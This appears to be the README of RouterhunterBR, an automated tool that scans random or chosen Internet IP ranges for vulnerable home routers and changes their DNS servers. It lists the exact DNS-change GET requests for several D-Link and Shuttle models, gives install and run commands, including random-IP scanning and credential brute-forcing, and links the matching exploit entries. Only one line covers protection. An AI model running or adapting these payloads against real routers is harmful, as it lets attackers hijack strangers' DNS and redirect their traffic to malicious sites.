The RouterhunterBR is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger on home routers.
The DNSChanger is a trojan able to direct user requests to illegal sites. In practice, this malware has the ability to change the DNS settings of our machine redirecting the user to sites with malicious purposes. Imagine for example that your system is infected with this malware, what might happen is that the user to access a particular site (eg. Facebook.com) may be forwarded to an unsolicited website and potentially illegal.
AUTOR: Jhonathan Davi AKA jh00nbr
EMAIL: jhoonbr@protonmail.ch
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/jh00nbr
Facebook: https://fb.com/JhonVipNet
Fanpage: https://fb.com/InurlBrasil
Github: https://github.com/jh00nbr/
Youtube: https://www.youtube.com/c/Mrsinisterboy
- GETs:
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1″
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsIfcsList=&dnsRefresh=1″
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=”
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1″
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP”
- INSTALLATION:
git clone https://github.com/jh00nbr/Routerhunter-2.0.git
- COMMANDs:
–range 201.12.50.0-255
Will set IP range that will be scanned
–bruteforce
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns.
–startip / –endip
You can customize the IP range with a wildcard / Example: –startip 201.*.*.* –endip 201.*.*.*
–dns1 8.8.8.8 / –dns2 8.8.4.4
Server primary and secondary dns malicious, that anger is listening for requests and will perform the redirection of pages
–threads 10
Set threads numbers
–randomip
Randomizing ips routers
–limitip 10
Define limite random ip
- Exploiting demonstration’s:
Random ips :
python routerhunter.py –dns1 8.8.8.8–dns2 8.8.4.4 –randomip –limitip 10 –threads 10
Scanner in range ip:
python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.4 –range 192.168.25.0-255 –threads 10
Brute force with users and passwords on routers that requires authentication:
python routerhunter.py –dns1 8.8.8.8 –-dns2 8.8.4.4 –range 177.106.19.65-70 –bruteforce –threads 10
How to protect yourself
All models of routers contained in the scanner and shown during the lecture already have firmware correction patches. Default users and passwords should be changed!
The script explores four vulnerabilities in routers
- Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change
Exploit http://www.exploit-db.com/exploits/35995/
- D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
http://www.exploit-db.com/exploits/35917/
- D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
http://1337day.com/exploit/23302/
- D-Link DSL-2780B DLink_1.01.14 – Unauthenticated Remote DNS Change
https://www.exploit-db.com/exploits/37237/
- D-Link DSL-2730B AU_2.01 – Authentication Bypass DNS Change
https://www.exploit-db.com/exploits/37240/
- D-Link DSL-526B ADSL2+ AU_2.01 – Unauthenticated Remote DNS Change
https://www.exploit-db.com/exploits/37241/
- DSLink 260E – Authenticated routers – DNS Changer – Bruteforce
https://www.youtube.com/watch?v=tNjy91g2Rak
http://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html